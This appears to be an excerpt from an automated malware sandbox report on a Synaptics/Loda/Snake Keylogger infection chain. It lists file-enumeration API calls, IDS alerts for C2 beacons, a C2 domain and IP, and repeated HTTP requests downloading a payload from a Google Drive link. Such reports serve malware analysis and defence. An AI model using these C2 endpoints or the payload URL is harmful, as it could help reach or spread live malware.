                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A0219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00A0219F
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00A024A9
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_009F6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_009F6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_009FF350
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CDD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_009CDD92
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_009FFDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009FFD47 FindFirstFileW,FindClose,9_2_009FFD47
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: excel.exeMemory has grown: Private usage: 1MB later: 67MB

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:49759 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49759 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.6:49796 -> 69.42.215.252:80
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49850 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49923 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49979 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:50039 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50039 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.6:50039
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50037 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49802 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49786 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49785 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49803 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49836 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49813 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49825 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49824 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49845 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49852 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49859 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49861 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49816 -> 142.250.186.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49867 -> 142.250.186.46:443
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: xred.mooo.com
                                Uses dynamic DNS services
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_001C550C
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=BYMo-wv4eYJdWmry7AUwgnY8FD94uo3veWkAXjfZOk1mv7TJVBgEhqFHCgX6R2JeKOBvo50nIjRpzf2b_9A2GW8ksEyt-5g4q85Ob8tsU_aR9mcINLgHh64rG-oKyQGbjBH7KUvXgliKdHc4uXAnoj7xbO6TIXqQNfde8w3K2uPd4t-_pCWMMPI
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Y_PNLw8RAdUj4J1fOerPMq8Ej9LvL1f7eF6_piOgXJNptBE8qxvPOkddsBqHD9gQOeCrJToQuet-_tokPg-JdZJiqyAu88gCyYeyuE48kpaD4y1_QnonBLTPPkt56ERiisqn6OfLmXRqnXEdx-shuyT3q60FEk5q_r3UTpHE8-DK_GE5EajAs4Vr
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: Synaptics.exe, 00000003.00000003.2356535180.0000000005605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *.google.com*.appuser.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be equals www.youtube.com (Youtube)
                                Source: Synaptics.exe, 00000003.00000003.2337108577.0000000005602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *.google.com*.appuser.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: Synaptics.exe, 00000003.00000003.2337108577.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4KlaZQ4n-XKMdW1aWpbAFMRpXtf-mXTavBuLeS7kh3Xpl8Tu7eBCs4dvenupWm320kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:24 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Zlj0acJSHkIHNfrDRTNwgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=BYMo-wv4eYJdWmry7AUwgnY8FD94uo3veWkAXjfZOk1mv7TJVBgEhqFHCgX6R2JeKOBvo50nIjRpzf2b_9A2GW8ksEyt-5g4q85Ob8tsU_aR9mcINLgHh64rG-oKyQGbjBH7KUvXgliKdHc4uXAnoj7xbO6TIXqQNfde8w3K2uPd4t-_pCWMMPI; expires=Tue, 01-Jul-2025 10:24:24 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7NffQA0sK6LlEYaFFQ7Ze0jEZ5-g3-HNlxD8dVcfnhVBVgP_ShdHb7zvTRGAe23PV3b7oa4L0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:24 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WqdjAfbOEyvViiWfNKNokA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Y_PNLw8RAdUj4J1fOerPMq8Ej9LvL1f7eF6_piOgXJNptBE8qxvPOkddsBqHD9gQOeCrJToQuet-_tokPg-JdZJiqyAu88gCyYeyuE48kpaD4y1_QnonBLTPPkt56ERiisqn6OfLmXRqnXEdx-shuyT3q60FEk5q_r3UTpHE8-DK_GE5EajAs4Vr; expires=Tue, 01-Jul-2025 10:24:24 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
